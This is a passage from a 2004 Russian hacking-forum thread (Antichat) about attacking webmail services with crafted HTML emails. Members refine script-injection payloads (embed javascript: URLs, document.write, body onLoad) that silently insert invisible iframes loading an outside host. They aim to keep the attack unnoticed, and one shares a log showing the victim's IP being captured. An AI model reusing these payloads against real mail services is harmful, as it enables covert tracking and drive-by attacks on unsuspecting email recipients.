HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу про статью на сайте
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 29.07.2004, 18:06
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
С нами: 11627066

Репутация: 42
По умолчанию
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июля 21 2004,15:19)</td></tr><tr><td id="QUOTE">я отправил на тестовый мыльник письмо в html виде с кодом </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><embed src="javascript:status=location;document.getElemen tById('xxx').innerHTML='<iframe src=http://asdfg178.narod.ru/jopa.html width=0 height=0></iframe>';this.wav" width=0 height=0> <p id='xxx'>[/QUOTE]<span id='postcolor'>
тока нихрена не работает [/QUOTE]<span id='postcolor'>
Ну во-первых у тебя &lt;iframe&gt; не заменен спец.символами. Поэтому он будет смотерться как &lt;xiframe&gt;.
Во-вторых getElementById объект DOM поддерживается ТОЧНО, только IE, насчет NN не знаю. А вот знаю что не поддерживается Оперой(хотя, бывают новые версии)). Для оперы можно сделать document.write, но тогда вся конспирация летит к чертям)
 
Ответить с цитированием

  #12  
Старый 01.08.2004, 08:54
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
С нами: 11540434

Репутация: 82
По умолчанию
как насчет такого
document.write(document.body.innerHTML+'&lt;'+'scr ipt'+'&gt;alert();&lt;'+'/script'+'&gt;');

здесь и document.write и сохраняем конспирацию
 
Ответить с цитированием

  #13  
Старый 01.08.2004, 19:59
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
С нами: 11627066

Репутация: 42
По умолчанию
zFailure
Все равно ты используешь код, который не поддерживается Оперой. По поаводу document.write имелось ввиду следующее:
document.write('&lt;iframe&gt;&lt;/iframe&gt;&#39;
тогда будет срабатывать на люой платформе, но при открытии письма - визуально чистая страница
 
Ответить с цитированием

  #14  
Старый 02.08.2004, 12:56
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
С нами: 11540434

Репутация: 82
По умолчанию
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=WINDOWS-1251">
<title>Untitled</title>
</head>

<body onLoad="document.write(document.body.innerHTML+'<i frame src=http://antichat.ru/cgi-bin/s.jpg?test width=0 height=0 style=display:none;></iframe>')">

1234567890

</body>
</html>[/QUOTE]<span id='postcolor'>

этот код был вызван мною в Opera 7.53

в итоге
[Mon Aug 2 12:53:46 2004] IP=XXX.XXX.XXX.XXX REFERER= QUERY=test
 
Ответить с цитированием

  #15  
Старый 03.08.2004, 19:13
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
С нами: 11627066

Репутация: 42
По умолчанию
zFailure... и то верно. весьма и весьма.. хехе)
Кстати, навскидку, так, не знаешь, &lt;iframe&gt; сейчас поддерживается nentscape'ом? не наду дистрибов что-то пока..
В скором времени отпишу сюда ещще кое-что, давольно интересная тема недавно была)
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.